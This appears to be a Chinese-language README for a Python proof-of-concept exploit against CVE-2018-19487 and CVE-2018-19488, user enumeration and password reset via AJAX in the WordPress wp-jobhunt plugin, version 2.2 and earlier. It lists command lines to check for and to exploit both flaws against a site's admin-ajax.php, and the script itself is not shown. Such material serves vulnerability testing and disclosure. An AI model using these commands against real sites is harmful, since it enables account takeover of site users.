CVE-2018-19487、CVE-2018-19488,针对 WordPress wp-jobhunt 插件的漏洞利用工具
wp-jobhunt 插件是配合 JobCareer 主题使用的插件:
https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636 (请参阅底部的更新日志)
针对 CVE-2018-19487(AJAX 用户信息泄露)和 CVE-2018-19488(AJAX 用户密码重置)的 Python 漏洞利用脚本,适用于 2.2 及更早版本。
依赖:
使用方法:
检查是否存在用户枚举漏洞:
python poc.py --checkenum https://wpsite/path/to/wp-admin/admin-ajax.php
检查是否存在用户密码重置漏洞:
python poc.py --checkreset https://wpsite/path/to/wp-admin/admin-ajax.php
利用用户枚举漏洞:
python poc.py --enum https://wpsite/path/to/wp-admin/admin-ajax.php
利用用户密码重置漏洞:
python poc.py --reset https://wpsite/path/to/wp-admin/admin-ajax.php